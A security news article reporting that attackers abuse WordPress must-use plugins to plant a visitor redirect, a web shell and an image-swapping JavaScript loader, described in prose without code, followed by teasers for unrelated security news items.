The technique was first discovered in February 2025, but its spread rate is continuously growing, and currently attackers abuse MU plugins to run three different types of malicious code.
Must-Use Plugins represent a special type of WordPress plugins that run every time the page is loaded and don’t require activation in the Admin Panel. These PHP files are stored in the wp-content/ directory, are executed automatically, and don’t appear in the Admin Panel on the Plugins page unless the Must-Use filter is selected.
Among other things, such plugins are used to enforce custom security rules across the website, boost performance, dynamically modify variables, etc.
Since MU plugins are executed on every page load and don’t appear in the standard plugin list, they can be used to covertly perform a wide range of malicious operations (e.g. steal credentials, inject malicious code, or modify HTML output).
Sucuri experts discovered three different payloads placed by cybercriminals to the MU-plugins directory:
-
redirect.redirects visitors (excluding bots and logged in admins) to the malicious website updatesnow[.]net that displays a fake browser update prompt to trick the victim into downloading malware;php -
index.is a web shell that acts as a backdoor by downloading and executing PHP code from a GitHub repository; andphp -
custom-js-loader.loads JavaScript that replaces all images on the website with explicit content, hijacks all external links, and opens fraudulent pop-ups instead.php
The most dangerous payload is the web shell since it enables attackers to remotely execute commands on the server, steal data, and deliver subsequent attacks on resource users and visitors.
The other two malware samples are more likely to damage the website’s reputation and its SEO rankings due to suspicious redirects and attempts to install malware on visitors’ computers.
The infection technique used by the malefactors remains unknown yet. Its assumed that the attackers exploit known vulnerabilities in WordPress plugins and themes or weak admin credentials.
2025.02.17 — Dutch police seize 127 servers belonging to Zservers hosting provider
Following the introduction of international sanctions against Zservers, Russian 'bulletproof' hosting services provider, the Dutch National Police (Politie) shut down and seized 127 servers belonging to Zservers/XHost.…
Full article →
2025.02.14 — 12,000 Kerio Control firewalls remain vulnerable to RCE
Security experts report that more than 12,000 GFI Kerio Control firewall instances remain vulnerable to the critical RCE vulnerability CVE-2024-52875, which was fixed…
Full article →
2025.01.27 — YouTube plays hour-long ads to users with ad blockers
Users complain that YouTube plays very long unskippable ads. Sometimes such ads are longer than the video the person is watching. The issue was raised…
Full article →
2025.04.25 — Asus patches vulnerability in AMI's MegaRAC enabling attackers to brick servers
Asus released patches for the CVE-2024-54085 vulnerability that allows attackers to seize and disable servers. The security hole affects the American Megatrends International (AMI) MegaRAC Baseboard Management…
Full article →
2025.02.01 — Critical RCE vulnerability fixed in Cacti
A critical vulnerability has been discovered in the open-source Cacti framework: it enables an authenticated attacker to remotely execute arbitrary code. Vulnerability's ID is CVE-2025-22604; its…
Full article →
2025.01.30 — Hackers use vulnerabilities in SimpleHelp RMM to attack corporate networks
Experts believe that recently patched vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) were used by attackers to gain initial access to corporate networks. A number…
Full article →
2025.03.05 — Polish Space Agency disconnects its network due to hacker attack
Last weekend, the Polish Space Agency (POLSA) had to disconnect all of its systems from the Internet to localize an attack targeting its IT infrastructure. After discovering the intrusion,…
Full article →
2025.03.24 — Alexa to stop processing data locally. All voice requests will be sent to Amazon Cloud
Amazon announced that the privacy option allowing users of Echo speakers to avoid sending their voice recordings to the company's cloud will no longer be supported. Effective March…
Full article →
2025.03.07 — YouTube warns of scam video featuring its CEO
According to YouTube, scammers use an AI-generated video of the company's CEO in phishing attacks to steal user credentials. The scammers attack content creators by sending them…
Full article →
2025.02.25 — More than 100,000 users downloaded SpyLend malware from Google Play Store
According to Cyfirma, a malicious Android app called SpyLend was available on the official Google Play Store for some time and has been downloaded from there…
Full article →